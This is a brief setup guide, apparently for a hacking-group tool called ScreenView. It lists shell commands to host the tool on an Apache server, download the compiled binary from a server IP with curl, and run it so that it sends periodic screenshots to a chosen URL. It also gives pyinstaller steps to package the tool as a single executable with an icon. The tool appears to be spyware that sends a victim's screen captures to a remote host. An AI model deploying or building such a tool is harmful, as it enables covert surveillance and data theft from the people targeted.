The Shadow Shark ScreenView module.
$ sudo apt-get install python3 python3-pip git apache2 php libapache2-mod-php
$ sudo service apache2 start
$ cd /var/www/html/
$ sudo git clone https://github.com/BababooeyHackers/ScreenView.git
$ sudo chown -R www-data:www-data /var/www/html/ScreenView/
$ cd ScreenView/
$ pip3 install -r requirements.txt
$ sudo pacman -S python python-pip git apache php php-apache
$ sudo systemctl start httpd
$ cd /srv/http/
$ sudo git clone https://github.com/BababooeyHackers/ScreenView.git
$ sudo chown -R www-data:www-data /srv/http/ScreenView/
$ cd ScreenView/
$ pip3 install -r requirements.txt
$ curl http://IP/ScreenView/ScreenView.(exe, app, etc) --output ScreenView.(exe, app, etc)
$ ScreenView.(exe, app, etc) --time (# Minutes) --url (Url to send screenshot to)
This module must be compiled on a Linux computer, Windows computer, Wine environment, or MacOS computer.
# First install python3 on your Linux computer, Windows computer, Wine environment, or MacOS computer.
$ pip(3) install -r requirements.txt
$ pyinstaller --onefile --icon icon.ico ScreenView.py